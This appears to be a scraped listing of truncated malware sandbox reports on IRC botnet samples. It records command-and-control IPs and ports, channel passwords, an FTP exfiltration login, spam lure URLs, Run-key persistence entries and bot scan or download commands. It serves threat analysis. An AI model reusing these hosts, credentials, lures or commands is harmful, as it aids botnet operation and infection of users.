Host Name IP Addressdell-d3e62f7e26 10.1.8.2sniff.runescapetube.com 65.23.155.179 * C&C Server: 65.23.155.179:8164 * Server Password: * Username: XP-6306 * Nickname: [00|DEU|293761] * Channel: #test# (Password: ) * Channeltopic: :.msn.msg RIP 🙁 http://inlakehouse.com/video002.php?=|.aim.msg this kid died from eating halloween candy he got.. look http://inlakehouse.com/video002.php?=|.triton.msg kid died from halloween candy he got http://inlakehouse.com/video002.php?= Registry Changes by all processesCreate orRead more...

Host Name IP Addressdell-d3e62f7e26 10.1.10.2fgp.e2doo.com 66.7.216.18 * C&C Server: 66.7.216.18:2345 * Server Password: * Username: XP-8343 * Nickname: [DEU|00|P|83992] * Channel: #imb (Password: test) * Channeltopic: :.msn.stop|.msn.msg hahaha u foto http://freelook.fr.ohost.de/viewimg.php?= Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce “wextract_cleanup0” = rundll32.exe C:WINDOWSsystem32advpack.dll,DelNodeRunDLL32 “C:DOKUME~1ADMINI~1LOKALE~1TempIXP000.TMP”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Firevall Administrating” = rndll.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “Firevall Administrating” = rndll.exeHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsListRead more...

Host Name IP Addressftp.xtserverxt.com 64.211.66.173Outgoing connection to remote server: ftp.xtserverxt.com TCP port 21Outgoing connection to remote server: ftp.xtserverxt.com TCP port 45685 USER xtserverxtPASS xt#server#xt Registry Changes by all processesCreate or Open Changes Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIMM “Ime File”HKEY_CURRENT_USERSoftwareMicrosoftCTF “Disable Thread Input Manager”HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dllRead more...

Remote Host Port Number82.146.52.236 6667 MODE [solo][USA|XP|LAN|71546] -ixJOIN #nes# usbPONG FBI.GoV * The following port was open in the system: Port Protocol Process1050 TCP winsvc32.exe (%Windir%winsvc32.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + winsvc32 = “winsvc32.exe” so that winsvc32.exe runs every time Windows starts Memory Modifications * There was aRead more...

Remote Host Port Number67.43.226.242 808067.43.232.37 186391.207.7.116 80 USER pmawga pmawga pmawga :ymfiwtkaatzcxdhrNICK RGqbPVQeMODE RGqbPVQe +xiJOIN #las6USERHOST RGqbPVQeMODE #m +smntuMODE #las6 +smntuNICK gYZaluELEMODE gYZaluELE +xiJOIN #rrrrrUSERHOST gYZaluELEMODE ##xddc +smntuMODE #xddc1 +smntuMODE #xddc2 +smntuMODE #rrrrr +smntuUSER ixaexy ixaexy ixaexy :dpsqkauvusrtzeaz Other details * The following ports were open in the system: Port Protocol Process1052 TCP spoolsvc.exe (%System%spoolsvc.exe)2335Read more...

Remote Host Port Number174.133.63.91 51987 NICK pLagUe{USA}56265MODE pLagUe{USA}56265 -ixJOIN #H1N1PRIVMSG #H1N1 :USER pLagUe * okTeaM UniX b0at 0.4PC has been ~iNfEctEd~ Other details * The following port was open in the system: Port Protocol Process1051 TCP raidhost.exe (%Windir%raidhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + raidhost = “raidhost.exe” so thatRead more...

Remote Host Port Number 64.89.27.36 51987 NICK pLagUe{USA}{LAN}27954 MODE pLagUe{USA}{LAN}27954 -ix JOIN #trees PRIVMSG #trees : PONG irc.lulz.ee USER pLagUe * ok TeaM UniX b0at 0.4 New Infection – Morpheous Stub Other details * The following port was open in the system: Port Protocol Process 1050 TCP raidhost.exe (%Windir%raidhost.exe) Registry Modifications * The newly createdRead more...

Remote Host Port Number69.16.172.40 7000 NICK marthanUSER roland “” “69.16.172.40” :kendrickPONG :2613115303PONG :1661756035PONG :1971802411 Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREClasses.cha o HKEY_LOCAL_MACHINESOFTWAREClasses.chat o HKEY_LOCAL_MACHINESOFTWAREClassesChatFile o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileDefaultIcon o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShell o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopen o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopencommand o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexec o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecApplication o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecifexec o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecTopic o HKEY_LOCAL_MACHINESOFTWAREClassesirc o HKEY_LOCAL_MACHINESOFTWAREClassesircDefaultIcon o HKEY_LOCAL_MACHINESOFTWAREClassesircShell o HKEY_LOCAL_MACHINESOFTWAREClassesircShellopen o HKEY_LOCAL_MACHINESOFTWAREClassesircShellopencommandRead more...

Remote Host Port Number174.133.222.172 445195.190.13.188 7272222.231.29.29 727289.149.244.22 80 * The data identified by the following URL was then requested from the remote web server: o http://hot.jatajoo.ru/hot.php NICK [N00_USA_XP_5605087]USER SP2-366 * 0 :COMPUTERNAMEJOIN #nit openPRIVMSG #modes2 :HTTP SET http://rapidshare.com/files/315648191/rostPRIVMSG #nit :scan// Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutesRead more...

Name Query Type Query Result Successful Protocol baca.no-ip.org DNS_TYPE_A 94.23.234.102 1 94.23.234.102:9876 Nick: :{00-AUT-XP-pc8-4662}Username: blazeServer Pass: uline131.Joined Channel: #ulineChannel Topic for Channel #uline: “!scan 90 1 85.x.x.x 3 1 85.x.x.x 3 16kkj”Private Message to User {iNF-00-AUT-XP-p`xf6’yxf6’x80xf6’xa0xf8’xb4x84@: “SC// Sequential Port Scan started on 1:90 with a delay of 60 seconds for 3 minutes using 1 threads.”Read more...